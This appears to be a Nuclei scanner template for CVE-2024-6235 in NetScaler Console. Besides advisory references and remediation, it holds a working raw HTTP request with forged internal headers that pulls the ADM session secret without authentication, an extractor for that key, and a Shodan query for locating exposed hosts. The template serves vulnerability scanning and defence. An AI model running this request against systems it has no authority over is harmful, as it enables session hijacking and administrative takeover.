id: CVE-2024-6235 info: name: NetScaler Console - Sensitive Information Disclosure author: DhiyaneshDk severity: critical description: | Sensitive information disclosure in NetScaler Console impact: | Attackers can access sensitive information including session secrets and administrative credentials from the NetScaler Console without proper authentication. remediation: | Apply the patches specified in Citrix advisory CTX677998 to address the information disclosure vulnerability in NetScaler Console. reference: - https://support.citrix.com/article/CTX677998 - https://attackerkb.com/topics/7zebEgmGLs/cve-2024-6235 - https://nvd.nist.gov/vuln/detail/cve-2024-6235 classification: cve-id: CVE-2024-6235 cwe-id: CWE-287 cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 epss-score: 0.87092 epss-percentile: 0.99464 cpe: cpe:2.3:a:citrix:netscaler_console:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"NetScaler Gateway" tags: cve,cve2024,netscaler,exposure,vkev,vuln http: - raw: - | GET /internal/v2/config/mps_secret/ADM_SESSIONID HTTP/1.1 Host: {{Hostname}} Referer: {{RootURL}}/admin_ui/mas/ent/html/main.html Content-Type: application/json If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT NITRO_WEB_APPLICATION: true Tenant-Name: Owner User-Name: nsroot Mps-Internal-Request: true matchers-condition: and matchers: - type: word part: body words: - '"mps_secret":' - 'ADM_SESSIONID' condition: and - type: status status: - 200 extractors: - type: json name: adm_sessionid_key json: - '.mps_secret[0].key_value' # digest: 4a0a0047304502210081a70b14883e229db01018ff96ba529fb97dcb9ac751cb230510d3dee4d14ca3022017d28ea9263dfa9e84edd318e4a84293eba54dfd4ca59c5cecab68f558579e12:922c64590222798bb761d5b6d8e72950